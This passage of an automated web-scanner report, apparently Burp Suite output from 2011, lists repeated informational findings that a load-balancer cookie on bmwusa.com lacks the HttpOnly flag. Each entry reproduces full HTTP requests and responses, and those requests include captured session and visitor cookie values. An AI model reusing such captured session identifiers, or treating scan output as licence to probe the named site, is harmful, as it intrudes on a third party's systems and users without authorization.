NSC_CNX_21529_64.29.204.16=4f52b42b3660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive35i/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:41:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:01:50 GMT;path=/
Content-Length: 212055


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.371. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:44:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:04:35 GMT;path=/
Content-Length: 224831


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.372. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:44:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:04:31 GMT;path=/
Content-Length: 224832


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.373. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:42:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:02:19 GMT;path=/
Content-Length: 239217


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.374. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:42:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:02:07 GMT;path=/
Content-Length: 239218


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.375. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:46:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:06:21 GMT;path=/
Content-Length: 201679


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.376. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:43:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:03:00 GMT;path=/
Content-Length: 201680


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.377. http://www.bmwusa.com/standard/content/vehicles/2011/x5/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:57:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:17:43 GMT;path=/
Content-Length: 199801


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.378. http://www.bmwusa.com/standard/content/vehicles/2011/x5/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:46:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:06:31 GMT;path=/
Content-Length: 199802


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.379. http://www.bmwusa.com/standard/content/vehicles/2011/x5/x5savexplorenew.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/x5savexplorenew.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/x5savexplorenew.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:46:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:06:45 GMT;path=/
Content-Length: 180315


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.380. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35d/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35d/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:53:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:13:21 GMT;path=/
Content-Length: 214470


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.381. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35d/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35d/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:54:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:14:04 GMT;path=/
Content-Length: 224849


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.382. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35d/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35d/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:53:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:13:37 GMT;path=/
Content-Length: 214642


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.383. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
